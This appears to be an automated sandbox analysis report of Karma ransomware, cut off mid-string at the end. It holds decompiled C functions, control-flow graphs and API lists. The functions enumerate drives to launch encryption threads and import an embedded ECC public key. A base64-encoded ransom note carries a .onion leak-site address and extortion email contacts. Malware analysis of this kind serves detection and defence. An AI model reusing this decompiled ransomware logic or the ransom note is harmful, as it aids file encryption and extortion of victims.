  • API ID: FileFind$Close$ChangeCreateFirstNextNotificationWrite
  • String ID: (B@$*.*$-ENCRYPTED.txt$KARMA$[+] File:
  • API String ID: 2220306862-2596288547
  • Opcode ID: 8a938890bff21654b03310ee6eca8aec884135f065448ed88dc19506c41084db
  • Instruction ID: 75b7a5a78fe1073b3c6088b204df1b69f2768af81c19e24722ade746e019dbe6
  • Opcode Fuzzy Hash: 8a938890bff21654b03310ee6eca8aec884135f065448ed88dc19506c41084db
  • Instruction Fuzzy Hash: 69322631604212CBC728DF24C0945BAB3F5FFA4749B58467ED8DAAB1C0FB35DA09C689
Uniqueness

Uniqueness Score: -1.00%

Download Yara Rule

Control-flow Graph

  • Executed
  • Not Executed
control_flow_graph 313 4035d0-4035dd 314 4035e0-403614 GetDriveTypeW GetProcessHeap HeapAlloc 313->314 315 403620-403662 CreateThread Sleep 314->315 316 403616-403619 314->316 318 403663-403667 315->318 316->315 317 40361b-40361e 316->317 317->315 317->318 318->314 319 40366d-403671 318->319 320 403673-403679 319->320 321 40368d-403693 319->321 322 403680-40368b WaitForSingleObject 320->322 322->321 322->322
C-Code - Quality: 100%
			E004035D0() {
				signed short _v6;
				signed short _v8;
				signed short _v10;
				short _v12;
				int _t22;
				void* _t24;
				void* _t25;
				void* _t32;
				signed int _t33;
				void* _t34;
				signed int _t36;
				void* _t37;

				_t36 = 0;
				_t25 = 0;
				do {
					_t1 = _t25 + 0x41; // 0x41
					_v10 = 0x5c003a;
					_v12 = _t1;
					_v6 = 0;
					_t22 = GetDriveTypeW( &_v12); // executed
					_t24 = HeapAlloc(GetProcessHeap(), 0, 4);
					_t32 = _t22 - 2;
					if(_t32 == 0) {
						L4:
						 *_t24 = _v12 & 0x0000ffff;
						 *((short*)(_t24 + 2)) = _v10 & 0x0000ffff;
						 *((short*)(_t24 + 4)) = _v8 & 0x0000ffff;
						 *((short*)(_t24 + 6)) = _v6 & 0x0000ffff;
						_t24 = CreateThread(0, 0, E004035A0, _t24, 0, 0); // executed
						 *(_t37 + _t36 * 4 - 0x70) = _t24;
						Sleep(0x1f4); // executed
						_t36 = _t36 + 1;
					} else {
						_t34 = _t32 - 1;
						if(_t34 == 0 || _t34 == 1) {
							goto L4;
						}
					}
					_t25 = _t25 + 1;
				} while (_t25 < 0x1a);
				_t33 = 0;
				if(_t36 > 0) {
					do {
						_t24 = WaitForSingleObject( *(_t37 + _t33 * 4 - 0x70), 0xffffffff);
						_t33 = _t33 + 1;
					} while (_t33 < _t36);
				}
				return _t24;
			}















0x004035d8
0x004035da
0x004035e0
0x004035e0
0x004035e3
0x004035ea
0x004035f0
0x004035f8
0x0040360b
0x00403611
0x00403614
0x00403620
0x00403628
0x00403630
0x0040363d
0x00403649
0x0040364d
0x00403658
0x0040365c
0x00403662
0x00403616
0x00403616
0x00403619
0x00000000
0x00000000
0x00403619
0x00403663
0x00403664
0x0040366d
0x00403671
0x00403680
0x00403686
0x00403688
0x00403689
0x00403680
0x00403693

APIs
  • GetDriveTypeW.KERNELBASE(00401CE0,?,00000000), ref: 004035F8
  • GetProcessHeap.KERNEL32(00000000,00000004,?,00000000), ref: 00403604
  • HeapAlloc.KERNEL32(00000000,?,00000000), ref: 0040360B
  • CreateThread.KERNELBASE(00000000,00000000,004035A0,00000000,00000000,00000000), ref: 0040364D
  • Sleep.KERNELBASE(000001F4,?,00000000), ref: 0040365C
  • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00403686
Strings
Memory Dump Source
  • Source File: 00000000.00000002.224986040.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.224981936.0000000000400000.00000002.00020000.sdmp Download File
  • Associated: 00000000.00000002.224990586.0000000000404000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_pss.jbxd
Similarity
  • API ID: Heap$AllocCreateDriveObjectProcessSingleSleepThreadTypeWait
  • String ID: :
  • API String ID: 1194941407-336475711
  • Opcode ID: b68e62db0e7d7ff1e76393a804ae40f3a4cccfeb63e304d6252fe6c83f6df8c1
  • Instruction ID: f9a26f22717e4b865f86f0128e4220b313bc1228d00de3c61ba25951b82e18bc
  • Opcode Fuzzy Hash: b68e62db0e7d7ff1e76393a804ae40f3a4cccfeb63e304d6252fe6c83f6df8c1
  • Instruction Fuzzy Hash: E921A572A40218BEC7109FF49D49B6E7B78FF85702F025566E705BB2E0D6794505C358
Uniqueness

Uniqueness Score: -1.00%

Download Yara Rule

Control-flow Graph

  • Executed
  • Not Executed
control_flow_graph 77 401df0-401e12 78 401e15-401e22 77->78 78->78 79 401e24-401e2f 78->79 80 401e30-401e39 79->80 80->80 81 401e3b-401e3f 80->81 82 401e40-401e4f 81->82 82->82 83 401e51-401e5a 82->83 84 401e6c-401e9e GetStdHandle WriteConsoleW 83->84 85 401e5c 83->85 87 401ea0-401ea7 LoadLibraryA 84->87 88 401eac-401eba 84->88 86 401e60-401e6a 85->86 86->84 86->86 87->88 89 401ecc-401ed5 88->89 90 401ebc-401ec6 GetProcAddress 88->90 91 401ed7 89->91 92 401eec-401f22 GetProcessHeap HeapAlloc 89->92 90->89 93 401ee0-401eea 91->93 95 401f33-401f3a 92->95 96 401f24-401f2d LoadLibraryA 92->96 93->92 93->93 97 401f49-401f52 95->97 98 401f3c-401f44 GetProcAddress 95->98 96->95 99 401f60-401f7a 97->99 100 401f54-401f5e 97->100 98->97 102 401f88-401f90 99->102 103 401f7c-401f83 LoadLibraryA 99->103 100->99 100->100 104 401fa2-401fab 102->104 105 401f92-401f9c GetProcAddress 102->105 103->102 106 401fbc-401ff4 GetProcessHeap HeapAlloc 104->106 107 401fad 104->107 105->104 110 402005-40200c 106->110 111 401ff6-401fff LoadLibraryA 106->111 108 401fb0-401fba 107->108 108->106 108->108 112 40201b-402024 110->112 113 40200e-402016 GetProcAddress 110->113 111->110 114 402026 112->114 115 40203c-402061 112->115 113->112 116 402030-40203a 114->116 116->115 116->116
C-Code - Quality: 69%
			E00401DF0() {
				long _v8;
				void _v528;
				signed int _t35;
				signed int _t36;
				signed int _t37;
				long _t38;
				struct HINSTANCE__* _t42;
				void* _t46;
				_Unknown_base(*)()* _t47;
				struct HINSTANCE__* _t49;
				void* _t55;
				_Unknown_base(*)()* _t56;
				void* _t58;
				void* _t64;
				void* _t65;
				signed int* _t68;
				signed short* _t69;
				signed int* _t70;
				signed int _t71;
				struct HINSTANCE__* _t72;
				signed int _t73;
				signed int _t74;
				struct HINSTANCE__* _t75;
				signed int _t76;
				void* _t79;
				signed short* _t80;
				_Unknown_base(*)()* _t81;
				_Unknown_base(*)()* _t83;
				void* _t91;
				void* _t103;
				void* _t107;
				void* _t111;
				void* _t115;

				_t68 =  &_v528 - 2;
				_t79 = (L"[+] Trying to import ECC public key..." -  &_v528 >> 1) + 1 + (L"[+] Trying to import ECC public key..." -  &_v528 >> 1) + 1;
				do {
					_t35 =  *(_t79 + _t68) & 0x0000ffff;
					_t68 =  &(_t68[0]);
					 *_t68 = _t35;
				} while (_t35 != 0);
				_t69 =  &_v528;
				_t80 = "\n";
				do {
					_t36 =  *_t69 & 0x0000ffff;
					_t69 =  &(_t69[1]);
				} while (_t36 != 0);
				_t70 = _t69 - 4;
				do {
					_t37 =  *_t80 & 0x0000ffff;
					_t70 =  &(_t70[0]);
					 *_t70 = _t37;
					_t8 =  &(_t80[1]); // 0x414b0000
					_t80 = _t8;
				} while (_t37 != 0);
				_t38 = 0;
				if(_v528 != 0) {
					do {
						_t38 = _t38 + 1;
					} while ( *((short*)(_t91 + _t38 * 2 - 0x20c)) != 0);
				}
				WriteConsoleW(GetStdHandle(0xfffffff5),  &_v528, _t38, 0, 0); // executed
				_t42 =  *0x406018;
				_v8 = 0;
				if(_t42 == 0) {
					_t42 = LoadLibraryA("crypt32.dll"); // executed
					 *0x406018 = _t42;
				}
				_t81 =  *0x406010;
				if(_t81 == 0) {
					_t81 = GetProcAddress(_t42, "CryptStringToBinaryW");
					 *0x406010 = _t81;
				}
				_t71 = 0;
				_t103 = L"38NFiLYfbhFc35sxdKxIJz8GZRTH+jBX8EUbjT8AAACdsfa4+Mfat5MB7M6iCYGuaz+QPBRwoPC+x4xl1QAAAA==" - _t71; // 0x33
				if(_t103 != 0) {
					asm("o16 nop [eax+eax]");
					do {
						_t71 = _t71 + 1;
					} while ( *((short*)(L"38NFiLYfbhFc35sxdKxIJz8GZRTH+jBX8EUbjT8AAACdsfa4+Mfat5MB7M6iCYGuaz+QPBRwoPC+x4xl1QAAAA==" + _t71 * 2)) != 0);
				}
				 *_t81(L"38NFiLYfbhFc35sxdKxIJz8GZRTH+jBX8EUbjT8AAACdsfa4+Mfat5MB7M6iCYGuaz+QPBRwoPC+x4xl1QAAAA==", _t71, 1, 0,  &_v8, 0, 0);
				_t46 = HeapAlloc(GetProcessHeap(), 0, _v8);
				_t72 =  *0x406018;
				_t64 = _t46;
				 *0x406004 = _t64;
				if(_t72 == 0) {
					_t72 = LoadLibraryA("crypt32.dll");
					 *0x406018 = _t72;
				}
				_t47 =  *0x406010;
				if(_t47 == 0) {
					_t47 = GetProcAddress(_t72, "CryptStringToBinaryW");
					 *0x406010 = _t47;
				}
				_t73 = 0;
				_t107 = L"38NFiLYfbhFc35sxdKxIJz8GZRTH+jBX8EUbjT8AAACdsfa4+Mfat5MB7M6iCYGuaz+QPBRwoPC+x4xl1QAAAA==" - _t73; // 0x33
				if(_t107 != 0) {
					do {
						_t73 = _t73 + 1;
					} while ( *((short*)(L"38NFiLYfbhFc35sxdKxIJz8GZRTH+jBX8EUbjT8AAACdsfa4+Mfat5MB7M6iCYGuaz+QPBRwoPC+x4xl1QAAAA==" + _t73 * 2)) != 0);
				}
				 *_t47(L"38NFiLYfbhFc35sxdKxIJz8GZRTH+jBX8EUbjT8AAACdsfa4+Mfat5MB7M6iCYGuaz+QPBRwoPC+x4xl1QAAAA==", _t73, 1, _t64,  &_v8, 0, 0);
				_t49 =  *0x406018;
				if(_t49 == 0) {
					_t49 = LoadLibraryA("crypt32.dll");
					 *0x406018 = _t49;
				}
				_t83 =  *0x406010;
				if(_t83 == 0) {
					_t83 = GetProcAddress(_t49, "CryptStringToBinaryW");
					 *0x406010 = _t83;
				}
				_t74 = 0;
				_t111 = L"WW91ciBuZXR3b3JrIGhhcyBiZWVuIGJyZWFjaGVkIGJ5IEthcm1hIHJhbnNvbXdhcmUgZ3JvdXAuDQpXZSBoYXZlIGV4dHJhY3RlZCB2YWx1YWJsZSBvciBzZW5zaXRpdmUgZGF0YSBmcm9tIHlvdXIgbmV0d29yayBhbmQgZW5jcnlwdGVkIHRoZSBkYXRhIG9uIHlvdXIgc3lzdGVtcy4gDQoNCkRlY3J5cHRpb24gaXMgb25seSBwb3NzaWJsZSB3aXRoIGEgcHJpdmF0ZSBrZXkgdGhhdCBvbmx5IHdlIHBvc3Nlcy4NCk91ciBncm91cCdzIG9ubHkgYWltIGlzIHRvIGZpbmFuY2lhbGx5IGJlbmVmaXQgZnJvbSBvdXIgYnJpZWYgYWNxdWFpbnRhbmNlLHRoaXMgaXMgYSBndWFyYW50ZWUgdGhhdCB3ZSB3aWxsIGRvIHdoYXQgd2UgcHJvbWlzZS4NClNjYW1taW5nIGlzIGp1c3QgYmFkIGZvciBidXNpbmVzcyBpbiB0aGlzIGxpbmUgb2Ygd29yay4NCg0KQ29udGFjdCB1cyB0byBuZWdvdGlhdGUgdGhlIHRlcm1zIG9mIHJldmVyc2luZyB0aGUgZGFtYWdlIHdlIGhhdmUgZG9uZSBhbmQgZGVsZXRpbmcgdGhlIGRhdGEgd2UgaGF2ZSBkb3dubG9hZGVkLg0KV2UgYWR2aXNlIHlvdSBub3QgdG8gdXNlIGFueSBkYXRhIHJlY292ZXJ5IHRvb2xzIHdpdGhvdXQgbGVhdmluZyBjb3BpZXMgb2YgdGhlIGluaXRpYWwgZW5jcnlwdGVkIGZpbGUuDQpZb3UgYXJlIHJpc2tpbmcgaXJyZXZlcnNpYmx5IGRhbWFnaW5nIHRoZSBmaWxlIGJ5IGRvaW5nIHRoaXMuIA0KDQpJZiB3ZSBhcmUgbm90IGNvbnRhY3RlZCBvciBpZiB3ZSBkbyBub3QgcmVhY2ggYW4gYWdyZWVtZW50IHdlIHdpbGwgbGVhayB5b3VyIGRhdGEgdG8gam91cm5hbGlzdHMgYW5kIHB1Ymxpc2ggaXQgb24gb3VyIHdlYnNpdGUuDQpodHRwOi8vM252enF5bzZsNHdrcnp1bXp1NWFvZDd6Ym9zcTRpcGdmN2lmZ2ozaHN2YmNyNXZjYXNvcmR2cWQub25pb24vDQoNCklmIGEgcmFuc29tIGlzIHBheWVkIHdlIHdpbGwgcHJvdmlkZSB0aGUgZGVjcnlwdGlvbiBrZXkgYW5kIHByb29mIHRoYXQgd2UgZGVsZXRlZCB5b3UgZGF0YS4NCldoZW4geW91IGNvbnRhY3QgdXMgd2Ugd2lsbCBwcm92aWRlIHlvdSBwcm9vZiB0aGF0IHdlIGNhbiBkZWNyeXB0IHlvdXIgZmlsZXMgYW5kIHRoYXQgd2UgaGF2ZSBkb3dubG9hZGVkIHlvdXIgZGF0YS4NCg0KSG93IHRvIGNvbnRhY3QgdXM6DQoNClZpbmNlR2lsYmVydEB0dXRhbm90YS5jb20NCkplcnNleVNtaXRoMTk4NkBvbmlvbm1haWwub3JnDQpyaWNoYXJkYnJ1bnNvbjE4OTJAcHJvdG9ubWFpbC5jb20g" - _t74; // 0x57
				if(_t111 != 0) {
					do {
						_t74 = _t74 + 1;
					} while ( *((short*)(L"WW91ciBuZXR3b3JrIGhhcyBiZWVuIGJyZWFjaGVkIGJ5IEthcm1hIHJhbnNvbXdhcmUgZ3JvdXAuDQpXZSBoYXZlIGV4dHJhY3RlZCB2YWx1YWJsZSBvciBzZW5zaXRpdmUgZGF0YSBmcm9tIHlvdXIgbmV0d29yayBhbmQgZW5jcnlwdGVkIHRoZSBkYXRhIG9uIHlvdXIgc3lzdGVtcy4gDQoNCkRlY3J5cHRpb24gaXMgb25seSBwb3NzaWJsZSB3aXRoIGEgcHJpdmF0ZSBrZXkgdGhhdCBvbmx5IHdlIHBvc3Nlcy4NCk91ciBncm91cCdzIG9ubHkgYWltIGlzIHRvIGZpbmFuY2lhbGx5IGJlbmVmaXQgZnJvbSBvdXIgYnJpZWYgYWNxdWFpbnRhbmNlLHRoaXMgaXMgYSBndWFyYW50ZWUgdGhhdCB3ZSB3aWxsIGRvIHdoYXQgd2UgcHJvbWlzZS4NClNjYW1taW5nIGlzIGp1c3QgYmFkIGZvciBidXNpbmVzcyBpbiB0aGlzIGxpbmUgb2Ygd29yay4NCg0KQ29udGFjdCB1cyB0byBuZWdvdGlhdGUgdGhlIHRlcm1zIG9mIHJldmVyc2luZyB0aGUgZGFtYWdlIHdlIGhhdmUgZG9uZSBhbmQgZGVsZXRpbmcgdGhlIGRhdGEgd2UgaGF2ZSBkb3dubG9hZGVkLg0KV2UgYWR2aXNlIHlvdSBub3QgdG8gdXNlIGFueSBkYXRhIHJlY292ZXJ5IHRvb2xzIHdpdGhvdXQgbGVhdmluZyBjb3BpZXMgb2YgdGhlIGluaXRpYWwgZW5jcnlwdGVkIGZpbGUuDQpZb3UgYXJlIHJpc2tpbmcgaXJyZXZlcnNpYmx5IGRhbWFnaW5nIHRoZSBmaWxlIGJ5IGRvaW5nIHRoaXMuIA0KDQpJZiB3ZSBhcmUgbm90IGNvbnRhY3RlZCBvciBpZiB3ZSBkbyBub3QgcmVhY2ggYW4gYWdyZWVtZW50IHdlIHdpbGwgbGVhayB5b3VyIGRhdGEgdG8gam91cm5hbGlzdHMgYW5kIHB1Ymxpc2ggaXQgb24gb3VyIHdlYnNpdGUuDQpodHRwOi8vM252enF5bzZsNHdrcnp1bXp1NWFvZDd6Ym9zcTRpcGdmN2lmZ2ozaHN2YmNyNXZjYXNvcmR2cWQub25pb24vDQoNCklmIGEgcmFuc29tIGlzIHBheWVkIHdlIHdpbGwgcHJvdmlkZSB0aGUgZGVjcnlwdGlvbiBrZXkgYW5kIHByb29mIHRoYXQgd2UgZGVsZXRlZCB5b3UgZGF0YS4NCldoZW4geW91IGNvbnRhY3QgdXMgd2Ugd2lsbCBwcm92aWRlIHlvdSBwcm9vZiB0aGF0IHdlIGNhbiBkZWNyeXB0IHlvdXIgZmlsZXMgYW5kIHRoYXQgd2UgaGF2ZSBkb3dubG9hZGVkIHlvdXIgZGF0YS4NCg0KSG93IHRvIGNvbnRhY3QgdXM6DQoNClZpbmNlR2lsYmVydEB0dXRhbm90YS5jb20NCkplcnNleVNtaXRoMTk4NkBvbmlvbm1haWwub3JnDQpyaWNoYXJkYnJ1bnNvbjE4OTJAcHJvdG9ubWFpbC5jb20g" + _t74 * 2)) != 0);
				}
				 *_t83(L"WW91ciBuZXR3b3JrIGhhcyBiZWVuIGJyZWFjaGVkIGJ5IEthcm1hIHJhbnNvbXdhcmUgZ3JvdXAuDQpXZSBoYXZlIGV4dHJhY3RlZCB2YWx1YWJsZSBvciBzZW5zaXRpdmUgZGF0YSBmcm9tIHlvdXIgbmV0d29yayBhbmQgZW5jcnlwdGVkIHRoZSBkYXRhIG9uIHlvdXIgc3lzdGVtcy4gDQoNCkRlY3J5cHRpb24gaXMgb25seSBwb3NzaWJsZSB3aXRoIGEgcHJpdmF0ZSBrZXkgdGhhdCBvbmx5IHdlIHBvc3Nlcy4NCk91ciBncm91cCdzIG9ubHkgYWltIGlzIHRvIGZpbmFuY2lhbGx5IGJlbmVmaXQgZnJvbSBvdXIgYnJpZWYgYWNxdWFpbnRhbmNlLHRoaXMgaXMgYSBndWFyYW50ZWUgdGhhdCB3ZSB3aWxsIGRvIHdoYXQgd2UgcHJvbWlzZS4NClNjYW1taW5nIGlzIGp1c3QgYmFkIGZvciBidXNpbmVzcyBpbiB0aGlzIGxpbmUgb2Ygd29yay4NCg0KQ29udGFjdCB1cyB0byBuZWdvdGlhdGUgdGhlIHRlcm1zIG9mIHJldmVyc2luZyB0aGUgZGFtYWdlIHdlIGhhdmUgZG9uZSBhbmQgZGVsZXRpbmcgdGhlIGRhdGEgd2UgaGF2ZSBkb3dubG9hZGVkLg0KV2UgYWR2aXNlIHlvdSBub3QgdG8gdXNlIGFueSBkYXRhIHJlY292ZXJ5IHRvb2xzIHdpdGhvdXQgbGVhdmluZyBjb3BpZXMgb2YgdGhlIGluaXRpYWwgZW5jcnlwdGVkIGZpbGUuDQpZb3UgYXJlIHJpc2tpbmcgaXJyZXZlcnNpYmx5IGRhbWFnaW5nIHRoZSBmaWxlIGJ5IGRvaW5nIHRoaXMuIA0KDQpJZiB3ZSBhcmUgbm90IGNvbnRhY3RlZCBvciBpZiB3ZSBkbyBub3QgcmVhY2ggYW4gYWdyZWVtZW50IHdlIHdpbGwgbGVhayB5b3VyIGRhdGEgdG8gam91cm5hbGlzdHMgYW5kIHB1Ymxpc2ggaXQgb24gb3VyIHdlYnNpdGUuDQpodHRwOi8vM252enF5bzZsNHdrcnp1bXp1NWFvZDd6Ym9zcTRpcGdmN2lmZ2ozaHN2YmNyNXZjYXNvcmR2cWQub25pb24vDQoNCklmIGEgcmFuc29tIGlzIHBheWVkIHdlIHdpbGwgcHJvdmlkZSB0aGUgZGVjcnlwdGlvbiBrZXkgYW5kIHByb29mIHRoYXQgd2UgZGVsZXRlZCB5b3UgZGF0YS4NCldoZW4geW91IGNvbnRhY3QgdXMgd2Ugd2lsbCBwcm92aWRlIHlvdSBwcm9vZiB0aGF0IHdlIGNhbiBkZWNyeXB0IHlvdXIgZmlsZXMgYW5kIHRoYXQgd2UgaGF2ZSBkb3dubG9hZGVkIHlvdXIgZGF0YS4NCg0KSG93IHRvIGNvbnRhY3QgdXM6DQoNClZpbmNlR2lsYmVydEB0dXRhbm90YS5jb20NCkplcnNleVNtaXRoMTk4NkBvbmlvbm1haWwub3JnDQpyaWNoYXJkYnJ1bnNvbjE4OTJAcHJvdG9ubWFpbC5jb20g", _t74, 1, 0,  &_v8, 0, 0);
				_t55 = HeapAlloc(GetProcessHeap(), 0, _v8 + 1);
				_t75 =  *0x406018;
				_t65 = _t55;
				 *0x406008 = _t65;
				if(_t75 == 0) {
					_t75 = LoadLibraryA("crypt32.dll");
					 *0x406018 = _t75;
				}
				_t56 =  *0x406010;
				if(_t56 == 0) {
					_t56 = GetProcAddress(_t75, "CryptStringToBinaryW");
					 *0x406010 = _t56;
				}
				_t76 = 0;
				_t115 = L"WW91ciBuZXR3b3JrIGhhcyBiZWVuIGJyZWFjaGVkIGJ5IEthcm1hIHJhbnNvbXdhcmUgZ3JvdXAuDQpXZSBoYXZlIGV4dHJhY3RlZCB2YWx1YWJsZSBvciBzZW5zaXRpdmUgZGF0YSBmcm9tIHlvdXIgbmV0d29yayBhbmQgZW5jcnlwdGVkIHRoZSBkYXRhIG9uIHlvdXIgc3lzdGVtcy4gDQoNCkRlY3J5cHRpb24gaXMgb25seSBwb3NzaWJsZSB3aXRoIGEgcHJpdmF0ZSBrZXkgdGhhdCBvbmx5IHdlIHBvc3Nlcy4NCk91ciBncm91cCdzIG9ubHkgYWltIGlzIHRvIGZpbmFuY2lhbGx5IGJlbmVmaXQgZnJvbSBvdXIgYnJpZWYgYWNxdWFpbnRhbmNlLHRoaXMgaXMgYSBndWFyYW50ZWUgdGhhdCB3ZSB3aWxsIGRvIHdoYXQgd2UgcHJvbWlzZS4NClNjYW1taW5nIGlzIGp1c3QgYmFkIGZvciBidXNpbmVzcyBpbiB0aGlzIGxpbmUgb2Ygd29yay4NCg0KQ29udGFjdCB1cyB0byBuZWdvdGlhdGUgdGhlIHRlcm1zIG9mIHJldmVyc2luZyB0aGUgZGFtYWdlIHdlIGhhdmUgZG9uZSBhbmQgZGVsZXRpbmcgdGhlIGRhdGEgd2UgaGF2ZSBkb3dubG9hZGVkLg0KV2UgYWR2aXNlIHlvdSBub3QgdG8gdXNlIGFueSBkYXRhIHJlY292ZXJ5IHRvb2xzIHdpdGhvdXQgbGVhdmluZyBjb3BpZXMgb2YgdGhlIGluaXRpYWwgZW5jcnlwdGVkIGZpbGUuDQpZb3UgYXJlIHJpc2tpbmcgaXJyZXZlcnNpYmx5IGRhbWFnaW5nIHRoZSBmaWxlIGJ5IGRvaW5nIHRoaXMuIA0KDQpJZiB3ZSBhcmUgbm90IGNvbnRhY3RlZCBvciBpZiB3ZSBkbyBub3QgcmVhY2ggYW4gYWdyZWVtZW50IHdlIHdpbGwgbGVhayB5b3VyIGRhdGEgdG8gam91cm5hbGlzdHMgYW5kIHB1Ymxpc2ggaXQgb24gb3VyIHdlYnNpdGUuDQpodHRwOi8vM252enF5bzZsNHdrcnp1bXp1NWFvZDd6Ym9zcTRpcGdmN2lmZ2ozaHN2YmNyNXZjYXNvcmR2cWQub25pb24vDQoNCklmIGEgcmFuc29tIGlzIHBheWVkIHdlIHdpbGwgcHJvdmlkZSB0aGUgZGVjcnlwdGlvbiBrZXkgYW5kIHByb29mIHRoYXQgd2UgZGVsZXRlZCB5b3UgZGF0YS4NCldoZW4geW91IGNvbnRhY3QgdXMgd2Ugd2lsbCBwcm92aWRlIHlvdSBwcm9vZiB0aGF0IHdlIGNhbiBkZWNyeXB0IHlvdXIgZmlsZXMgYW5kIHRoYXQgd2UgaGF2ZSBkb3dubG9hZGVkIHlvdXIgZGF0YS4NCg0KSG93IHRvIGNvbnRhY3QgdXM6DQoNClZpbmNlR2lsYmVydEB0dXRhbm90YS5jb20NCkplcnNleVNtaXRoMTk4NkBvbmlvbm1haWwub3JnDQpyaWNoYXJkYnJ1bnNvbjE4OTJAcHJvdG9ubWFpbC5jb20g" - _t76; // 0x57
				if(_t115 != 0) {
					asm("o16 nop [eax+eax]");
					do {
						_t76 = _t76 + 1;
					} while ( *((short*)(L"WW91ciBuZXR3b3JrIGhhcyBiZWVuIGJyZWFjaGVkIGJ5IEthcm1hIHJhbnNvbXdhcmUgZ3JvdXAuDQpXZSBoYXZlIGV4dHJhY3RlZCB2YWx1YWJsZSBvciBzZW5zaXRpdmUgZGF0YSBmcm9tIHlvdXIgbmV0d29yayBhbmQgZW5jcnlwdGVkIHRoZSBkYXRhIG9uIHlvdXIgc3lzdGVtcy4gDQoNCkRlY3J5cHRpb24gaXMgb25seSBwb3NzaWJsZSB3aXRoIGEgcHJpdmF0ZSBrZXkgdGhhdCBvbmx5IHdlIHBvc3Nlcy4NCk91ciBncm91cCdzIG9ubHkgYWltIGlzIHRvIGZpbmFuY2lhbGx5IGJlbmVmaXQgZnJvbSBvdXIgYnJpZWYgYWNxdWFpbnRhbmNlLHRoaXMgaXMgYSBndWFyYW50ZWUgdGhhdCB3ZSB3aWxsIGRvIHdoYXQgd2UgcHJvbWlzZS4NClNjYW1taW5nIGlzIGp1c3QgYmFkIGZvciBidXNpbmVzcyBpbiB0aGlzIGxpbmUgb2Ygd29yay4NCg0KQ29udGFjdCB1cyB0byBuZWdvdGlhdGUgdGhlIHRlcm1zIG9mIHJldmVyc2luZyB0aGUgZGFtYWdlIHdlIGhhdmUgZG9uZSBhbmQgZGVsZXRpbmcgdGhlIGRhdGEgd2UgaGF2ZSBkb3dubG9hZGVkLg0KV2UgYWR2aXNlIHlvdSBub3QgdG8gdXNlIGFueSBkYXRhIHJlY292ZXJ5IHRvb2xzIHdpdGhvdXQgbGVhdmluZyBjb3BpZXMgb2YgdGhlIGluaXRpYWwgZW5jcnlwdGVkIGZpbGUuDQpZb3UgYXJlIHJpc2tpbmcgaXJyZXZlcnNpYmx5IGRhbWFnaW5nIHRoZSBmaWxlIGJ5IGRvaW5nIHRoaXMuIA0KDQpJZiB3ZSBhcmUgbm90IGNvbnRhY3RlZCBvciBpZiB3ZSBkbyBub3QgcmVhY2ggYW4gYWdyZWVtZW50IHdlIHdpbGwgbGVhayB5b3VyIGRhdGEgdG8gam91cm5hbGlzdHMgYW5kIHB1Ymxpc2ggaXQgb24gb3VyIHdlYnNpdGUuDQpodHRwOi8vM252enF5bzZsNHdrcnp1bXp1NWFvZDd6Ym9zcTRpcGdmN2lmZ2ozaHN2YmNyNXZjYXNvcmR2cWQub25pb24vDQoNCklmIGEgcmFuc29tIGlzIHBheWVkIHdlIHdpbGwgcHJvdmlkZSB0aGUgZGVjcnlwdGlvbiBrZXkgYW5kIHByb29mIHRoYXQgd2UgZGVsZXRlZCB5b3UgZGF0YS4NCldoZW4geW91IGNvbnRhY3QgdXMgd2Ugd2lsbCBwcm92aWRlIHlvdSBwcm9vZiB0aGF0IHdlIGNhbiBkZWNyeXB0IHlvdXIgZmlsZXMgYW5kIHRoYXQgd2UgaGF2ZSBkb3dubG9hZGVkIHlvdXIgZGF0YS4NCg0KSG93IHRvIGNvbnRhY3QgdXM6DQoNClZpbmNlR2lsYmVydEB0dXRhbm90YS5jb20NCkplcnNleVNtaXRoMTk4NkBvbmlvbm1haWwub3JnDQpyaWNoYXJkYnJ1bnNvbjE4OTJAcHJvdG9ubWFpbC5jb20g" + _t76 * 2)) != 0);
				}
				 *_t56(L"WW91ciBuZXR3b3JrIGhhcyBiZWVuIGJyZWFjaGVkIGJ5IEthcm1hIHJhbnNvbXdhcmUgZ3JvdXAuDQpXZSBoYXZlIGV4dHJhY3RlZCB2YWx1YWJsZSBvciBzZW5zaXRpdmUgZGF0YSBmcm9tIHlvdXIgbmV0d29yayBhbmQgZW5jcnlwdGVkIHRoZSBkYXRhIG9uIHlvdXIgc3lzdGVtcy4gDQoNCkRlY3J5cHRpb24gaXMgb25seSBwb3NzaWJsZSB3aXRoIGEgcHJpdmF0ZSBrZXkgdGhhdCBvbmx5IHdlIHBvc3Nlcy4NCk91ciBncm91cCdzIG9ubHkgYWltIGlzIHRvIGZpbmFuY2lhbGx5IGJlbmVmaXQgZnJvbSBvdXIgYnJpZWYgYWNxdWFpbnRhbmNlLHRoaXMgaXMgYSBndWFyYW50ZWUgdGhhdCB3ZSB3aWxsIGRvIHdoYXQgd2UgcHJvbWlzZS4NClNjYW1taW5nIGlzIGp1c3QgYmFkIGZvciBidXNpbmVzcyBpbiB0aGlzIGxpbmUgb2Ygd29yay4NCg0KQ29udGFjdCB1cyB0byBuZWdvdGlhdGUgdGhlIHRlcm1zIG9mIHJldmVyc2luZyB0aGUgZGFtYWdlIHdlIGhhdmUgZG9uZSBhbmQgZGVsZXRpbmcgdGhlIGRhdGEgd2UgaGF2ZSBkb3dubG9hZGVkLg0KV2UgYWR2aXNlIHlvdSBub3QgdG8gdXNlIGFueSBkYXRhIHJlY292ZXJ5IHRvb2xzIHdpdGhvdXQgbGVhdmluZyBjb3BpZXMgb2YgdGhlIGluaXRpYWwgZW5jcnlwdGVkIGZpbGUuDQpZb3UgYXJlIHJpc2tpbmcgaXJyZXZlcnNpYmx5IGRhbWFnaW5nIHRoZSBmaWxlIGJ5IGRvaW5nIHRoaXMuIA0KDQpJZiB3ZSBhcmUgbm90IGNvbnRhY3RlZCBvciBpZiB3ZSBkbyBub3QgcmVhY2ggYW4gYWdyZWVtZW50IHdlIHdpbGwgbGVhayB5b3VyIGRhdGEgdG8gam91cm5hbGlzdHMgYW5kIHB1Ymxpc2ggaXQgb24gb3VyIHdlYnNpdGUuDQpodHRwOi8vM252enF5bzZsNHdrcnp1bXp1NWFvZDd6Ym9zcTRpcGdmN2lmZ2ozaHN2YmNyNXZjYXNvcmR2cWQub25pb24vDQoNCklmIGEgcmFuc29tIGlzIHBheWVkIHdlIHdpbGwgcHJvdmlkZSB0aGUgZGVjcnlwdGlvbiBrZXkgYW5kIHByb29mIHRoYXQgd2UgZGVsZXRlZCB5b3UgZGF0YS4NCldoZW4geW91IGNvbnRhY3QgdXMgd2Ugd2lsbCBwcm92aWRlIHlvdSBwcm9vZ